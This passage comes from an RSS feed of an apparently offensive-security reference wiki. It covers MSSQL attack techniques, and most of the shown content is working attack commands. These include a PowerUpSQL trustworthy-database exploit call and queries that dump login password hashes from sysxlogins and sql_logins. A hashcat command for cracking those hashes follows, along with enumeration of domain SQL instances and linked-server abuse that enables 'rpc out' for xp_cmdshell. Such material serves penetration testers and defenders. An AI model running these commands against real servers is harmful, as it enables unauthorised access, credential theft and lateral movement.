&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="trustworthy-databases" class="anchored-heading"&gt;Trustworthy Databases&lt;a class="heading-anchor" href="#trustworthy-databases" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Invoke&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;SQLAuditPrivTrustworthy&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;Instance&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&amp;lt;DBSERVERNAME\DBInstance&amp;gt;&amp;#34;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;Exploit&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="k"&gt;Verbose&lt;/span&gt;&lt;span class="w"&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;as&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;database_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;SUSER_NAME&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;owner_sid&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;database_owner&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;is_trustworthy_on&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;TRUSTWORTHY&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;databases&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;blockquote&gt;
&lt;p&gt;The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound.&lt;/p&gt;</description></item><item><title>MSSQL - Command Execution</title><link>https://bokkapig.pages.dev/refs/internal/databases/mssql-command-execution/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/databases/mssql-command-execution/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#command-execution-via-xp_cmdshell"&gt;Command Execution via xp_cmdshell&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#extended-stored-procedure"&gt;Extended Stored Procedure&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#add-the-extended-stored-procedure-and-list-extended-stored-procedures"&gt;Add the extended stored procedure and list extended stored procedures&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#clr-assemblies"&gt;CLR Assemblies&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#execute-commands-using-clr-assembly"&gt;Execute commands using CLR assembly&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#manually-creating-a-clr-dll-and-importing-it"&gt;Manually creating a CLR DLL and importing it&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#ole-automation"&gt;OLE Automation&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#execute-commands-using-ole-automation-procedures"&gt;Execute commands using OLE automation procedures&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#agent-jobs"&gt;Agent Jobs&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#execute-commands-through-sql-agent-job-service"&gt;Execute commands through SQL Agent Job service&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#list-all-jobs"&gt;List All Jobs&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#external-scripts"&gt;External Scripts&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#python"&gt;Python&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#r"&gt;R&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="command-execution-via-xp_cmdshell" class="anchored-heading"&gt;Command Execution via xp_cmdshell&lt;a class="heading-anchor" href="#command-execution-via-xp_cmdshell" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;xp_cmdshell disabled by default since SQL Server 2005&lt;/p&gt;</description></item><item><title>MSSQL - Credentials</title><link>https://bokkapig.pages.dev/refs/internal/databases/mssql-credentials/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/databases/mssql-credentials/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#mssql-accounts-and-hashes"&gt;MSSQL Accounts and Hashes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#list-credentials-on-the-sql-server"&gt;List Credentials on the SQL Server&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#proxy-account-context"&gt;Proxy Account Context&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="mssql-accounts-and-hashes" class="anchored-heading"&gt;MSSQL Accounts and Hashes&lt;a class="heading-anchor" href="#mssql-accounts-and-hashes" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;MSSQL 2000&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;password&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;master&lt;/span&gt;&lt;span class="p"&gt;..&lt;/span&gt;&lt;span class="n"&gt;sysxlogins&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;master&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dbo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;fn_varbintohexstr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;password&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;master&lt;/span&gt;&lt;span class="p"&gt;..&lt;/span&gt;&lt;span class="n"&gt;sysxlogins&lt;/span&gt;&lt;span class="w"&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;-- (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;MSSQL 2005&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;password_hash&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;master&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sql_logins&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;-&amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;master&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;fn_varbintohexstr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;password_hash&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;master&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sql_logins&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Then crack passwords using Hashcat : &lt;code&gt;hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force&lt;/code&gt;&lt;/p&gt;</description></item><item><title>MSSQL - Database Enumeration</title><link>https://bokkapig.pages.dev/refs/internal/databases/mssql-enumeration/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/databases/mssql-enumeration/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#identify-instances-and-databases"&gt;Identify Instances and Databases&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#discover-local-sql-server-instances"&gt;Discover Local SQL Server Instances&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#discover-domain-sql-server-instances"&gt;Discover Domain SQL Server Instances&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#discover-remote-sql-server-instances"&gt;Discover Remote SQL Server Instances&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#identify-encrypted-databases"&gt;Identify Encrypted databases&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#version-query"&gt;Version Query&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#identify-users-and-roles"&gt;Identify Users and Roles&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#identify-sensitive-information"&gt;Identify Sensitive Information&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#get-tables-from-a-specific-database"&gt;Get Tables from a Specific Database&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#gather-5-entries-from-each-column"&gt;Gather 5 Entries from Each Column&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#gather-5-entries-from-a-specific-table"&gt;Gather 5 Entries from a Specific Table&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#dump-common-information-from-server-to-files"&gt;Dump common information from server to files&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/NetSPI/PowerUpSQL"&gt;NetSPI/PowerUpSQL&lt;/a&gt; - A PowerShell Toolkit for Attacking SQL Server&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/skahwah/SQLRecon/"&gt;skahwah/SQLRecon&lt;/a&gt; - A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="identify-instances-and-databases" class="anchored-heading"&gt;Identify Instances and Databases&lt;a class="heading-anchor" href="#identify-instances-and-databases" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="discover-local-sql-server-instances" class="anchored-heading"&gt;Discover Local SQL Server Instances&lt;a class="heading-anchor" href="#discover-local-sql-server-instances" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-SQLInstanceLocal&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="discover-domain-sql-server-instances" class="anchored-heading"&gt;Discover Domain SQL Server Instances&lt;a class="heading-anchor" href="#discover-domain-sql-server-instances" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-SQLInstanceDomain&lt;/span&gt; &lt;span class="n"&gt;-Verbose&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Get Server Info for Found Instances&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-SQLInstanceDomain&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Get-SQLServerInfo&lt;/span&gt; &lt;span class="n"&gt;-Verbose&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Get Database Names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-SQLInstanceDomain&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Get-SQLDatabase&lt;/span&gt; &lt;span class="n"&gt;-NoDefaults&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="discover-remote-sql-server-instances" class="anchored-heading"&gt;Discover Remote SQL Server Instances&lt;a class="heading-anchor" href="#discover-remote-sql-server-instances" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-SQLInstanceBroadcast&lt;/span&gt; &lt;span class="n"&gt;-Verbose&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-SQLInstanceScanUDPThreaded&lt;/span&gt; &lt;span class="n"&gt;-Verbose&lt;/span&gt; &lt;span class="n"&gt;-ComputerName&lt;/span&gt; &lt;span class="n"&gt;SQLServer1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="identify-encrypted-databases" class="anchored-heading"&gt;Identify Encrypted databases&lt;a class="heading-anchor" href="#identify-encrypted-databases" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;Note: These are automatically decrypted for admins&lt;/p&gt;</description></item><item><title>MSSQL - Linked Database</title><link>https://bokkapig.pages.dev/refs/internal/databases/mssql-linked-database/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/databases/mssql-linked-database/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#find-trusted-link"&gt;Find Trusted Link&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#execute-query-through-the-link"&gt;Execute Query Through The Link&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#crawl-links-for-instances-in-the-domain"&gt;Crawl Links for Instances in the Domain&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#crawl-links-for-a-specific-instance"&gt;Crawl Links for a Specific Instance&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#query-version-of-linked-database"&gt;Query Version of Linked Database&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#execute-procedure-on-linked-database"&gt;Execute Procedure on Linked Database&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#determine-names-of-linked-databases"&gt;Determine Names of Linked Databases&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#determine-all-the-tables-names-from-a-selected-linked-database"&gt;Determine All the Tables Names from a Selected Linked Database&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#gather-the-top-5-columns-from-a-selected-linked-table"&gt;Gather the Top 5 Columns from a Selected Linked Table&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#gather-entries-from-a-selected-linked-column"&gt;Gather Entries from a Selected Linked Column&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="find-trusted-link" class="anchored-heading"&gt;Find Trusted Link&lt;a class="heading-anchor" href="#find-trusted-link" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;select&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;master&lt;/span&gt;&lt;span class="p"&gt;..&lt;/span&gt;&lt;span class="n"&gt;sysservers&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="execute-query-through-the-link" class="anchored-heading"&gt;Execute Query Through The Link&lt;a class="heading-anchor" href="#execute-query-through-the-link" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;-- execute query through the link
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;select&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;openquery&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;dcorp-sql1&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;select * from master..sysservers&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;select&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;version&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;openquery&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;linkedserver&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;select @@version as version&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;-- chain multiple openquery
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;select&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;version&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;openquery&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;link1&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;select version from openquery(&amp;#34;link2&amp;#34;,&amp;#34;select @@version as version&amp;#34;)&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;-- enable rpc out for xp_cmdshell
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;EXEC&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;sp_serveroption&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;sqllinked-hostname&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;rpc&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;true&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;EXEC&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;sp_serveroption&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;sqllinked-hostname&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;rpc out&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;true&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;select&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;openquery&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;SQL03&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;EXEC sp_serveroption &amp;#39;&amp;#39;SQL03&amp;#39;&amp;#39;,&amp;#39;&amp;#39;rpc&amp;#39;&amp;#39;,&amp;#39;&amp;#39;true&amp;#39;&amp;#39;;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;select&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;openquery&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;SQL03&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;EXEC sp_serveroption &amp;#39;&amp;#39;SQL03&amp;#39;&amp;#39;,&amp;#39;&amp;#39;rpc out&amp;#39;&amp;#39;,&amp;#39;&amp;#39;true&amp;#39;&amp;#39;;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;-- execute shell commands
